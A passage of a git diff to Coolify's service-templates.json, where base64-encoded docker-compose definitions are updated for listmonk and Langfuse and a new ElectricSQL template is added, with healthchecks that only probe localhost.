2tob3VzZS9jbGlja2hvdXNlLXNlcnZlcjoyNi4yLjQuMjMnCiAgICB1c2VyOiAnMTAxOjEwMScKICAgIGVudmlyb25tZW50OgogICAgICAtICdDTElDS0hPVVNFX0RCPSR7Q0xJQ0tIT1VTRV9EQjotZGVmYXVsdH0nCiAgICAgIC0gJ0NMSUNLSE9VU0VfVVNFUj0ke1NFUlZJQ0VfVVNFUl9DTElDS0hPVVNFfScKICAgICAgLSAnQ0xJQ0tIT1VTRV9QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfQ0xJQ0tIT1VTRX0nCiAgICB2b2x1bWVzOgogICAgICAtICdsYW5nZnVzZV9jbGlja2hvdXNlX2RhdGE6L3Zhci9saWIvY2xpY2tob3VzZScKICAgICAgLSAnbGFuZ2Z1c2VfY2xpY2tob3VzZV9sb2dzOi92YXIvbG9nL2NsaWNraG91c2Utc2VydmVyJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6ICd3Z2V0IC0tbm8tdmVyYm9zZSAtLXRyaWVzPTEgLS1zcGlkZXIgaHR0cDovL2xvY2FsaG9zdDo4MTIzL3BpbmcgfHwgZXhpdCAxJwogICAgICBpbnRlcnZhbDogNXMKICAgICAgdGltZW91dDogNXMKICAgICAgcmV0cmllczogMTAK",
         "tags": [
             "ai",
             "qdrant",
@@ -2502,7 +2518,7 @@
     "listmonk": {
         "documentation": "https://listmonk.app/?utm_source=coolify.io",
         "slogan": "Self-hosted newsletter and mailing list manager",
-        "compose": "c2VydmljZXM6CiAgbGlzdG1vbms6CiAgICBpbWFnZTogJ2xpc3Rtb25rL2xpc3Rtb25rOnY2LjAuMCcKICAgIGVudmlyb25tZW50OgogICAgICAtIFNFUlZJQ0VfVVJMX0xJU1RNT05LXzkwMDAKICAgICAgLSAnTElTVE1PTktfYXBwX19hZGRyZXNzPTAuMC4wLjA6OTAwMCcKICAgICAgLSBMSVNUTU9OS19kYl9faG9zdD1wb3N0Z3JlcwogICAgICAtIExJU1RNT05LX2RiX19uYW1lPWxpc3Rtb25rCiAgICAgIC0gTElTVE1PTktfZGJfX3VzZXI9JFNFUlZJQ0VfVVNFUl9QT1NUR1JFUwogICAgICAtIExJU1RNT05LX2RiX19wYXNzd29yZD0kU0VSVklDRV9QQVNTV09SRF9QT1NUR1JFUwogICAgICAtIExJU1RNT05LX2RiX19wb3J0PTU0MzIKICAgICAgLSBUWj1FdGMvVVRDCiAgICB2b2x1bWVzOgogICAgICAtICdsaXN0bW9uay1kYXRhOi9saXN0bW9uay91cGxvYWRzJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIHdnZXQKICAgICAgICAtICctcScKICAgICAgICAtICctLXNwaWRlcicKICAgICAgICAtICdodHRwOi8vMTI3LjAuMC4xOjkwMDAnCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiAyMHMKICAgICAgcmV0cmllczogMTAKICAgIGRlcGVuZHNfb246CiAgICAgIHBvc3RncmVzOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgbGlzdG1vbmstaW5pdGlhbC1kYXRhYmFzZS1zZXR1cDoKICAgIGltYWdlOiAnbGlzdG1vbmsvbGlzdG1vbms6djYuMC4wJwogICAgY29tbWFuZDogJy4vbGlzdG1vbmsgLS1pbnN0YWxsIC0teWVzIC0taWRlbXBvdGVudCcKICAgIHJlc3RhcnQ6ICdubycKICAgIGRlcGVuZHNfb246CiAgICAgIHBvc3RncmVzOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBMSVNUTU9OS19kYl9faG9zdD1wb3N0Z3JlcwogICAgICAtIExJU1RNT05LX2RiX19uYW1lPWxpc3Rtb25rCiAgICAgIC0gTElTVE1PTktfZGJfX3VzZXI9JFNFUlZJQ0VfVVNFUl9QT1NUR1JFUwogICAgICAtIExJU1RNT05LX2RiX19wYXNzd29yZD0kU0VSVklDRV9QQVNTV09SRF9QT1NUR1JFUwogICAgICAtIExJU1RNT05LX2RiX19wb3J0PTU0MzIKICBwb3N0Z3JlczoKICAgIGltYWdlOiAncG9zdGdyZXM6MTgtYWxwaW5lJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gUE9TVEdSRVNfREI9bGlzdG1vbmsKICAgICAgLSBQT1NUR1JFU19QQVNTV09SRD0kU0VSVklDRV9QQVNTV09SRF9QT1NUR1JFUwogICAgICAtIFBPU1RHUkVTX1VTRVI9JFNFUlZJQ0VfVVNFUl9QT1NUR1JFUwogICAgdm9sdW1lczoKICAgICAgLSAncG9zdGdyZXMtZGF0YTovdmFyL2xpYi9wb3N0Z3Jlc3FsJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICdwZ19pc3JlYWR5IC1VICQke1BPU1RHUkVTX1VTRVJ9IC1kICQke1BPU1RHUkVTX0RCfScKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAo=",
+        "compose": "c2VydmljZXM6CiAgbGlzdG1vbms6CiAgICBpbWFnZTogJ2xpc3Rtb25rL2xpc3Rtb25rOnY2LjAuMCcKICAgIGVudmlyb25tZW50OgogICAgICAtIFNFUlZJQ0VfVVJMX0xJU1RNT05LXzkwMDAKICAgICAgLSAnTElTVE1PTktfYXBwX19hZGRyZXNzPTAuMC4wLjA6OTAwMCcKICAgICAgLSBMSVNUTU9OS19kYl9faG9zdD1wb3N0Z3JlcwogICAgICAtIExJU1RNT05LX2RiX19kYXRhYmFzZT1saXN0bW9uawogICAgICAtIExJU1RNT05LX2RiX191c2VyPSRTRVJWSUNFX1VTRVJfUE9TVEdSRVMKICAgICAgLSBMSVNUTU9OS19kYl9fcGFzc3dvcmQ9JFNFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVMKICAgICAgLSBMSVNUTU9OS19kYl9fcG9ydD01NDMyCiAgICAgIC0gVFo9RXRjL1VUQwogICAgdm9sdW1lczoKICAgICAgLSAnbGlzdG1vbmstZGF0YTovbGlzdG1vbmsvdXBsb2FkcycKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSB3Z2V0CiAgICAgICAgLSAnLXEnCiAgICAgICAgLSAnLS1zcGlkZXInCiAgICAgICAgLSAnaHR0cDovLzEyNy4wLjAuMTo5MDAwJwogICAgICBpbnRlcnZhbDogNXMKICAgICAgdGltZW91dDogMjBzCiAgICAgIHJldHJpZXM6IDEwCiAgICBkZXBlbmRzX29uOgogICAgICBwb3N0Z3JlczoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogIGxpc3Rtb25rLWluaXRpYWwtZGF0YWJhc2Utc2V0dXA6CiAgICBpbWFnZTogJ2xpc3Rtb25rL2xpc3Rtb25rOnY2LjAuMCcKICAgIGNvbW1hbmQ6ICcuL2xpc3Rtb25rIC0taW5zdGFsbCAtLXllcyAtLWlkZW1wb3RlbnQnCiAgICByZXN0YXJ0OiAnbm8nCiAgICBkZXBlbmRzX29uOgogICAgICBwb3N0Z3JlczoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gTElTVE1PTktfZGJfX2hvc3Q9cG9zdGdyZXMKICAgICAgLSBMSVNUTU9OS19kYl9fZGF0YWJhc2U9bGlzdG1vbmsKICAgICAgLSBMSVNUTU9OS19kYl9fdXNlcj0kU0VSVklDRV9VU0VSX1BPU1RHUkVTCiAgICAgIC0gTElTVE1PTktfZGJfX3Bhc3N3b3JkPSRTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTCiAgICAgIC0gTElTVE1PTktfZGJfX3BvcnQ9NTQzMgogIHBvc3RncmVzOgogICAgaW1hZ2U6ICdwb3N0Z3JlczoxOC1hbHBpbmUnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBQT1NUR1JFU19EQj1saXN0bW9uawogICAgICAtIFBPU1RHUkVTX1BBU1NXT1JEPSRTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTCiAgICAgIC0gUE9TVEdSRVNfVVNFUj0kU0VSVklDRV9VU0VSX1BPU1RHUkVTCiAgICB2b2x1bWVzOgogICAgICAtICdwb3N0Z3Jlcy1kYXRhOi92YXIvbGliL3Bvc3RncmVzcWwnCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gJ3BnX2lzcmVhZHkgLVUgJCR7UE9TVEdSRVNfVVNFUn0gLWQgJCR7UE9TVEdSRVNfREJ9JwogICAgICBpbnRlcnZhbDogNXMKICAgICAgdGltZW91dDogMjBzCiAgICAgIHJldHJpZXM6IDEwCg==",
         "tags": [
             "newsletter",
             "mailing list",
diff --git a/templates/service-templates.json b/templates/service-templates.json
index 85445faf6..768f43985 100644
--- a/templates/service-templates.json
+++ b/templates/service-templates.json
@@ -1102,6 +1102,22 @@
         "minversion": "0.0.0",
         "port": "9200"
     },
+    "electricsql": {
+        "documentation": "https://electric-sql.com/docs/guides/deployment?utm_source=coolify.io",
+        "slogan": "Sync shape-based subsets of your Postgres data over HTTP.",
+        "compose": "c2VydmljZXM6CiAgZWxlY3RyaWM6CiAgICBpbWFnZTogJ2VsZWN0cmljc3FsL2VsZWN0cmljOjEuNC4yJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9GUUROX0VMRUNUUklDXzMwMDAKICAgICAgLSAnREFUQUJBU0VfVVJMPSR7REFUQUJBU0VfVVJMOj99JwogICAgICAtICdFTEVDVFJJQ19TRUNSRVQ9JHtTRVJWSUNFX1BBU1NXT1JEXzY0X0VMRUNUUklDfScKICAgICAgLSBFTEVDVFJJQ19TVE9SQUdFX0RJUj0vYXBwL3BlcnNpc3RlbnQKICAgICAgLSAnRUxFQ1RSSUNfVVNBR0VfUkVQT1JUSU5HPSR7RUxFQ1RSSUNfVVNBR0VfUkVQT1JUSU5HOi1mYWxzZX0nCiAgICB2b2x1bWVzOgogICAgICAtICdlbGVjdHJpY19kYXRhOi9hcHAvcGVyc2lzdGVudCcKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSBjdXJsCiAgICAgICAgLSAnLWYnCiAgICAgICAgLSAnaHR0cDovLzEyNy4wLjAuMTozMDAwL3YxL2hlYWx0aCcKICAgICAgaW50ZXJ2YWw6IDEwcwogICAgICB0aW1lb3V0OiA1cwogICAgICByZXRyaWVzOiA1Cg==",
+        "tags": [
+            "electric",
+            "electricsql",
+            "realtime",
+            "sync",
+            "postgresql"
+        ],
+        "category": "backend",
+        "logo": "svgs/electricsql.svg",
+        "minversion": "0.0.0",
+        "port": "3000"
+    },
     "emby": {
         "documentation": "https://emby.media/support/articles/Home.html?utm_source=coolify.io",
         "slogan": "A media server software that allows you to organize, stream, and access your multimedia content effortlessly.",
@@ -2356,7 +2372,7 @@
     "langfuse": {
         "documentation": "https://langfuse.com/docs?utm_source=coolify.io",
         "slogan": "Langfuse is an open-source LLM engineering platform that helps teams collaboratively debug, analyze, and iterate on their LLM applications.",
-        "compose": "eC1hcHAtZW52OgogIC0gJ05FWFRBVVRIX1VSTD0ke1NFUlZJQ0VfRlFETl9MQU5HRlVTRX0nCiAgLSAnREFUQUJBU0VfVVJMPXBvc3RncmVzcWw6Ly8ke1NFUlZJQ0VfVVNFUl9QT1NUR1JFU306JHtTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTfUBwb3N0Z3Jlczo1NDMyLyR7UE9TVEdSRVNfREI6LWxhbmdmdXNlLWRifScKICAtICdTQUxUPSR7U0VSVklDRV9QQVNTV09SRF9TQUxUfScKICAtICdFTkNSWVBUSU9OX0tFWT0ke1NFUlZJQ0VfUEFTU1dPUkRfNjRfTEFOR0ZVU0V9JwogIC0gJ1RFTEVNRVRSWV9FTkFCTEVEPSR7VEVMRU1FVFJZX0VOQUJMRUQ6LWZhbHNlfScKICAtICdMQU5HRlVTRV9FTkFCTEVfRVhQRVJJTUVOVEFMX0ZFQVRVUkVTPSR7TEFOR0ZVU0VfRU5BQkxFX0VYUEVSSU1FTlRBTF9GRUFUVVJFUzotZmFsc2V9JwogIC0gJ0NMSUNLSE9VU0VfTUlHUkFUSU9OX1VSTD1jbGlja2hvdXNlOi8vY2xpY2tob3VzZTo5MDAwJwogIC0gJ0NMSUNLSE9VU0VfVVJMPWh0dHA6Ly9jbGlja2hvdXNlOjgxMjMnCiAgLSAnQ0xJQ0tIT1VTRV9VU0VSPSR7U0VSVklDRV9VU0VSX0NMSUNLSE9VU0V9JwogIC0gJ0NMSUNLSE9VU0VfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX0NMSUNLSE9VU0V9JwogIC0gQ0xJQ0tIT1VTRV9DTFVTVEVSX0VOQUJMRUQ9ZmFsc2UKICAtICdMQU5HRlVTRV9VU0VfQVpVUkVfQkxPQj0ke0xBTkdGVVNFX1VTRV9BWlVSRV9CTE9COi1mYWxzZX0nCiAgLSAnTEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX0JVQ0tFVD0ke0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9CVUNLRVQ6LWxhbmdmdXNlfScKICAtICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfUkVHSU9OPSR7TEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX1JFR0lPTjotYXV0b30nCiAgLSAnTEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX0FDQ0VTU19LRVlfSUQ9JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfQUNDRVNTX0tFWV9JRH0nCiAgLSAnTEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX1NFQ1JFVF9BQ0NFU1NfS0VZPSR7TEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX1NFQ1JFVF9BQ0NFU1NfS0VZfScKICAtICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfRU5EUE9JTlQ9JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfRU5EUE9JTlR9JwogIC0gJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9GT1JDRV9QQVRIX1NUWUxFPSR7TEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX0ZPUkNFX1BBVEhfU1RZTEU6LXRydWV9JwogIC0gJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9QUkVGSVg9JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfUFJFRklYOi1ldmVudHMvfScKICAtICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfQlVDS0VUPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0JVQ0tFVDotbGFuZ2Z1c2V9JwogIC0gJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9SRUdJT049JHtMQU5HRlVTRV9TM19NRURJQV9VUExPQURfUkVHSU9OOi1hdXRvfScKICAtICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfQUNDRVNTX0tFWV9JRD0ke0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9BQ0NFU1NfS0VZX0lEfScKICAtICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfU0VDUkVUX0FDQ0VTU19LRVk9JHtMQU5HRlVTRV9TM19NRURJQV9VUExPQURfU0VDUkVUX0FDQ0VTU19LRVl9JwogIC0gJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9FTkRQT0lOVD0ke0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9FTkRQT0lOVH0nCiAgLSAnTEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0ZPUkNFX1BBVEhfU1RZTEU9JHtMQU5HRlVTRV9TM19NRURJQV9VUExPQURfRk9SQ0VfUEFUSF9TVFlMRTotdHJ1ZX0nCiAgLSAnTEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX1BSRUZJWD0ke0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9QUkVGSVg6LW1lZGlhL30nCiAgLSAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0VOQUJMRUQ9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRU5BQkxFRDotZmFsc2V9JwogIC0gJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9CVUNLRVQ9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfQlVDS0VUOi1sYW5nZnVzZX0nCiAgLSAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1BSRUZJWD0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9QUkVGSVg6LWV4cG9ydHMvfScKICAtICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfUkVHSU9OPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1JFR0lPTjotYXV0b30nCiAgLSAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0VORFBPSU5UPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0VORFBPSU5UfScKICAtICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRVhURVJOQUxfRU5EUE9JTlQ9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRVhURVJOQUxfRU5EUE9JTlR9JwogIC0gJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9BQ0NFU1NfS0VZX0lEPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0FDQ0VTU19LRVlfSUR9JwogIC0gJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9TRUNSRVRfQUNDRVNTX0tFWT0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9TRUNSRVRfQUNDRVNTX0tFWX0nCiAgLSAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0ZPUkNFX1BBVEhfU1RZTEU9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRk9SQ0VfUEFUSF9TVFlMRTotdHJ1ZX0nCiAgLSAnTEFOR0ZVU0VfSU5HRVNUSU9OX1FVRVVFX0RFTEFZX01TPSR7TEFOR0ZVU0VfSU5HRVNUSU9OX1FVRVVFX0RFTEFZX01TOi0xfScKICAtICdMQU5HRlVTRV9JTkdFU1RJT05fQ0xJQ0tIT1VTRV9XUklURV9JTlRFUlZBTF9NUz0ke0xBTkdGVVNFX0lOR0VTVElPTl9DTElDS0hPVVNFX1dSSVRFX0lOVEVSVkFMX01TOi0xMDAwfScKICAtIFJFRElTX0hPU1Q9cmVkaXMKICAtIFJFRElTX1BPUlQ9NjM3OQogIC0gJ1JFRElTX0FVVEg9JHtTRVJWSUNFX1BBU1NXT1JEX1JFRElTfScKICAtICdFTUFJTF9GUk9NX0FERFJFU1M9JHtFTUFJTF9GUk9NX0FERFJFU1M6LWFkbWluQGV4YW1wbGUuY29tfScKICAtICdTTVRQX0NPTk5FQ1RJT05fVVJMPSR7U01UUF9DT05ORUNUSU9OX1VSTDotfScKICAtICdORVhUQVVUSF9TRUNSRVQ9JHtTRVJWSUNFX0JBU0U2NF9ORVhUQVVUSFNFQ1JFVH0nCiAgLSAnQVVUSF9ESVNBQkxFX1NJR05VUD0ke0FVVEhfRElTQUJMRV9TSUdOVVA6LXRydWV9JwogIC0gJ0hPU1ROQU1FPSR7SE9TVE5BTUU6LTAuMC4wLjB9JwogIC0gJ0xBTkdGVVNFX0lOSVRfT1JHX0lEPSR7TEFOR0ZVU0VfSU5JVF9PUkdfSUQ6LW15LW9yZ30nCiAgLSAnTEFOR0ZVU0VfSU5JVF9PUkdfTkFNRT0ke0xBTkdGVVNFX0lOSVRfT1JHX05BTUU6LU15IE9yZ30nCiAgLSAnTEFOR0ZVU0VfSU5JVF9QUk9KRUNUX0lEPSR7TEFOR0ZVU0VfSU5JVF9QUk9KRUNUX0lEOi1teS1wcm9qZWN0fScKICAtICdMQU5HRlVTRV9JTklUX1BST0pFQ1RfTkFNRT0ke0xBTkdGVVNFX0lOSVRfUFJPSkVDVF9OQU1FOi1NeSBQcm9qZWN0fScKICAtICdMQU5HRlVTRV9JTklUX1VTRVJfRU1BSUw9JHtMQU5HRlVTRV9JTklUX1VTRVJfRU1BSUw6LWFkbWluQGV4YW1wbGUuY29tfScKICAtICdMQU5HRlVTRV9JTklUX1VTRVJfTkFNRT0ke1NFUlZJQ0VfVVNFUl9MQU5HRlVTRX0nCiAgLSAnTEFOR0ZVU0VfSU5JVF9VU0VSX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9MQU5HRlVTRX0nCnNlcnZpY2VzOgogIGxhbmdmdXNlOgogICAgaW1hZ2U6ICdsYW5nZnVzZS9sYW5nZnVzZTozJwogICAgZGVwZW5kc19vbjoKICAgICAgcG9zdGdyZXM6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgICAgcmVkaXM6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgICAgY2xpY2tob3VzZToKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgZW52aXJvbm1lbnQ6CiAgICAgIDA6ICdORVhUQVVUSF9VUkw9JHtTRVJWSUNFX0ZRRE5fTEFOR0ZVU0V9JwogICAgICAxOiAnREFUQUJBU0VfVVJMPXBvc3RncmVzcWw6Ly8ke1NFUlZJQ0VfVVNFUl9QT1NUR1JFU306JHtTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTfUBwb3N0Z3Jlczo1NDMyLyR7UE9TVEdSRVNfREI6LWxhbmdmdXNlLWRifScKICAgICAgMjogJ1NBTFQ9JHtTRVJWSUNFX1BBU1NXT1JEX1NBTFR9JwogICAgICAzOiAnRU5DUllQVElPTl9LRVk9JHtTRVJWSUNFX1BBU1NXT1JEXzY0X0xBTkdGVVNFfScKICAgICAgNDogJ1RFTEVNRVRSWV9FTkFCTEVEPSR7VEVMRU1FVFJZX0VOQUJMRUQ6LWZhbHNlfScKICAgICAgNTogJ0xBTkdGVVNFX0VOQUJMRV9FWFBFUklNRU5UQUxfRkVBVFVSRVM9JHtMQU5HRlVTRV9FTkFCTEVfRVhQRVJJTUVOVEFMX0ZFQVRVUkVTOi1mYWxzZX0nCiAgICAgIDY6ICdDTElDS0hPVVNFX01JR1JBVElPTl9VUkw9Y2xpY2tob3VzZTovL2NsaWNraG91c2U6OTAwMCcKICAgICAgNzogJ0NMSUNLSE9VU0VfVVJMPWh0dHA6Ly9jbGlja2hvdXNlOjgxMjMnCiAgICAgIDg6ICdDTElDS0hPVVNFX1VTRVI9JHtTRVJWSUNFX1VTRVJfQ0xJQ0tIT1VTRX0nCiAgICAgIDk6ICdDTElDS0hPVVNFX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9DTElDS0hPVVNFfScKICAgICAgMTA6IENMSUNLSE9VU0VfQ0xVU1RFUl9FTkFCTEVEPWZhbHNlCiAgICAgIDExOiAnTEFOR0ZVU0VfVVNFX0FaVVJFX0JMT0I9JHtMQU5HRlVTRV9VU0VfQVpVUkVfQkxPQjotZmFsc2V9JwogICAgICAxMjogJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9CVUNLRVQ9JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfQlVDS0VUOi1sYW5nZnVzZX0nCiAgICAgIDEzOiAnTEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX1JFR0lPTj0ke0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9SRUdJT046LWF1dG99JwogICAgICAxNDogJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9BQ0NFU1NfS0VZX0lEPSR7TEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX0FDQ0VTU19LRVlfSUR9JwogICAgICAxNTogJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9TRUNSRVRfQUNDRVNTX0tFWT0ke0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9TRUNSRVRfQUNDRVNTX0tFWX0nCiAgICAgIDE2OiAnTEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX0VORFBPSU5UPSR7TEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX0VORFBPSU5UfScKICAgICAgMTc6ICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfRk9SQ0VfUEFUSF9TVFlMRT0ke0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9GT1JDRV9QQVRIX1NUWUxFOi10cnVlfScKICAgICAgMTg6ICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfUFJFRklYPSR7TEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX1BSRUZJWDotZXZlbnRzL30nCiAgICAgIDE5OiAnTEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0JVQ0tFVD0ke0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9CVUNLRVQ6LWxhbmdmdXNlfScKICAgICAgMjA6ICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfUkVHSU9OPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX1JFR0lPTjotYXV0b30nCiAgICAgIDIxOiAnTEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0FDQ0VTU19LRVlfSUQ9JHtMQU5HRlVTRV9TM19NRURJQV9VUExPQURfQUNDRVNTX0tFWV9JRH0nCiAgICAgIDIyOiAnTEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX1NFQ1JFVF9BQ0NFU1NfS0VZPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX1NFQ1JFVF9BQ0NFU1NfS0VZfScKICAgICAgMjM6ICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfRU5EUE9JTlQ9JHtMQU5HRlVTRV9TM19NRURJQV9VUExPQURfRU5EUE9JTlR9JwogICAgICAyNDogJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9GT1JDRV9QQVRIX1NUWUxFPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0ZPUkNFX1BBVEhfU1RZTEU6LXRydWV9JwogICAgICAyNTogJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9QUkVGSVg9JHtMQU5HRlVTRV9TM19NRURJQV9VUExPQURfUFJFRklYOi1tZWRpYS99JwogICAgICAyNjogJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9FTkFCTEVEPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0VOQUJMRUQ6LWZhbHNlfScKICAgICAgMjc6ICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfQlVDS0VUPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0JVQ0tFVDotbGFuZ2Z1c2V9JwogICAgICAyODogJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9QUkVGSVg9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfUFJFRklYOi1leHBvcnRzL30nCiAgICAgIDI5OiAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1JFR0lPTj0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9SRUdJT046LWF1dG99JwogICAgICAzMDogJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9FTkRQT0lOVD0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9FTkRQT0lOVH0nCiAgICAgIDMxOiAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0VYVEVSTkFMX0VORFBPSU5UPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0VYVEVSTkFMX0VORFBPSU5UfScKICAgICAgMzI6ICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfQUNDRVNTX0tFWV9JRD0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9BQ0NFU1NfS0VZX0lEfScKICAgICAgMzM6ICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfU0VDUkVUX0FDQ0VTU19LRVk9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfU0VDUkVUX0FDQ0VTU19LRVl9JwogICAgICAzNDogJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9GT1JDRV9QQVRIX1NUWUxFPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0ZPUkNFX1BBVEhfU1RZTEU6LXRydWV9JwogICAgICAzNTogJ0xBTkdGVVNFX0lOR0VTVElPTl9RVUVVRV9ERUxBWV9NUz0ke0xBTkdGVVNFX0lOR0VTVElPTl9RVUVVRV9ERUxBWV9NUzotMX0nCiAgICAgIDM2OiAnTEFOR0ZVU0VfSU5HRVNUSU9OX0NMSUNLSE9VU0VfV1JJVEVfSU5URVJWQUxfTVM9JHtMQU5HRlVTRV9JTkdFU1RJT05fQ0xJQ0tIT1VTRV9XUklURV9JTlRFUlZBTF9NUzotMTAwMH0nCiAgICAgIDM3OiBSRURJU19IT1NUPXJlZGlzCiAgICAgIDM4OiBSRURJU19QT1JUPTYzNzkKICAgICAgMzk6ICdSRURJU19B